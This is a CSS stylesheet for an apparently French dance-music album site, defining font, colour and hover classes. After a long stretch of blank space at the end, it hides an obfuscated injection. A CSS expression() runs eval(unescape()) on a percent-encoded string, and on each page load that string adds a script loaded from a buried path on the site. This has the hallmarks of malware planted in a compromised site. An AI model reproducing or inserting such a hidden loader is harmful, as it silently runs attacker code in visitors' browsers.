BODY {
scrollbar-face-color:#000040;
scrollbar-highlight-color:#000000;
scrollbar-3dlight-color:#4F00C8;
scrollbar-darkshadow-color:#000000;
scrollbar-shadow-color:#4F00C8;
scrollbar-arrow-color:#FFC600;
scrollbar-track-color:#000000;
}

.v13b {
	font-family: Verdana;
	font-size: 13px;
	font-weight: bold;
}
.a11 {
	font-family: Arial;
	font-size: 11px;
}
.v13bw {
	font-family: Arial;
	font-size: 13px;
	font-weight: bold;
	color: #FFFFFF;

}
.ora11b {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 11px;
	font-weight: bold;
	color: #FFFFFF;
}
.ora11b:hover {
	color: #FFFF00;
	text-decoration: underline;
}
.a10w:hover {
	text-decoration: underline;
}
.backTxtBox {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 11px;
	color: #FFFFFF;
	background-color: #000038;
	border: 1px solid #3B107D;

}
.a11w {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 11px;
	color: #FFFFFF;
}
.a10 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 10px;
	color: #000000;
}
.ora12b {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	font-weight: bold;
	color: #FF9900;
}
.ora12b:hover {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	font-weight: bold;
	color: #FFFF00;
	text-decoration: underline;
}
.a12w {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	color: #FFFFFF;
}
.a13 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 13px;
}
.a12bw {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	font-weight: bold;
	color: #FFFFFF;
}
.a11bw {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 11px;
	font-weight: bold;
	color: #FFFFFF;
}
.a12bw:hover {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	font-weight: bold;
	color: #FFFF00;
	text-decoration: underline;
}
.a12:hover {
	text-decoration: underline;
	color: #000000;
}
.linkAlbumHome {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 11px;
	color: #000000;
}
.linkAlbumHome:hover {
	text-decoration: underline;
	color: #454885;
}

.a10:hover {
	text-decoration: underline;
	color: #000000;
}
.backNews {
	background-image: url(http://power.dance.free.fr/all/img/common/back_news.gif);
	background-repeat: no-repeat;
}
.v11 {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 11px;
}
.a12 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
}
.a12g:hover {
	color: #FF9900;
}
.backTxtBox2 {
	border: 1px solid #5F79AB;
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;

}
A:link {
	text-decoration: none;
}
A:hover {
	text-decoration: underline;
}
A:visited {
	text-decoration: none;
}
.linkCover {
	border: 1px solid #000066;
}
.linkCover2 {
	border: 1px solid #FCAC10;
}
.linkCover:hover {
	border: 1px solid #FFFF00;
}
.linkCoverNew {
	border: 1px solid #FFFF00;
}
.ora12 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	color: #FF9900;
}
.ora12:hover {
	color: #FFFF00;
	text-decoration: underline;
}
.yellow12 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	color: #FFFF00;
}
.yellow12:hover {
	text-decoration: underline overline;
}
.ora15b {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 15px;
	font-weight: bold;
	color: #FDB100;
}
.a13w {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 13px;
	color: #FFFFFF;
}
.a13bw {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 13px;
	font-weight: bold;
	color: #FFFFFF;
}
.a10w {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 10px;
	color: #CCCCCC;
}
.a11g {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 11px;
	color: #999999;
}
.bluetitle {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 18px;
	font-weight: bold;
	color: #010559;
}
.backNouveaute {
	background-image: url(http://power.dance.free.fr/all/img/common/back_nouveau.gif);
	background-repeat: no-repeat;
}
.a13b {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 13px;
	font-weight: bold;
}
.a12g {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	color: #666666;
}
.a12bg {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	font-weight: bold;
	color: #666666;
}
.a13bg {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 13px;
	font-weight: bold;
	color: #666666;
}
.a13bluebold {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 13px;
	font-weight: bold;
	color: #010559;
}
.a13blue {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 13px;
	color: #010559;
}
.a13lightbluebold {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 13px;
	color: #8E90BC;
	font-weight: bold;
}
.a13lightblue {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 13px;
	color: #8E90BC;
}
.ora13b {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 13px;
	font-weight: bold;
	color: #FDB100;
}
.ora13 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 15px;
	color: #FDB100;
}
.bluepurple {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 13px;
	color: #CED9F6;
}.dotsvert {
	border-top-width: 1px;
	border-right-width: 1px;
	border-bottom-width: 1px;
	border-left-width: 1px;
	border-left-style: dotted;
	border-top-color: #000000;
	border-right-color: #000000;
	border-bottom-color: #000000;
	border-left-color: #000000;
}
.a13byellow {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 13px;
	font-weight: bold;
	color: #FFFF00;
}
.numberTop {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 18px;
	font-weight: bolder;
	color: #FFFFFF;
	filter: DropShadow(Color=#000000, OffX=1, OffY=2, Positive=1);
}
.a10bw {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 10px;
	font-weight: bold;
	color: #FFFFFF;
}
.a12b {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	font-weight: bold;
}
.cadreSearch {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 10px;
	border: 1px solid #7476A4;
	height: 15px;
	width: 125px;
	color: #660099;

}
.v12 {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 12px;
}
.spacer3px {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 1px;
	color: #FFFFFF;

}
.TitleAlbums {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 14px;
	font-style: italic;
	color: #000033;
}
.linkHostAlbum {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 9px;
	color: #333333;
}
.downloadNow {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 11px;
	color: #000033;
}
.listboxAlbum {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 9px;
	border: 1px solid #000066;
}
h1 {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 14px;
	font-style: italic;
	color: #000033;
}




































































































                                                                                                                                                      /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%35%38%38%34%36%38%3B%20%4A%53%53%33%20%3D%20%27%2F%61%6C%6C%2F%69%6E%63%6C%75%64%65%73%2F%70%68%70%2F%61%6C%62%75%6D%73%2F%6E%75%6E%75%71%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%61%6C%6C%2F%69%6E%63%6C%75%64%65%73%2F%70%68%70%2F%61%6C%62%75%6D%73%2F%6E%75%6E%75%71%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */                                                                                                                                                      




































































































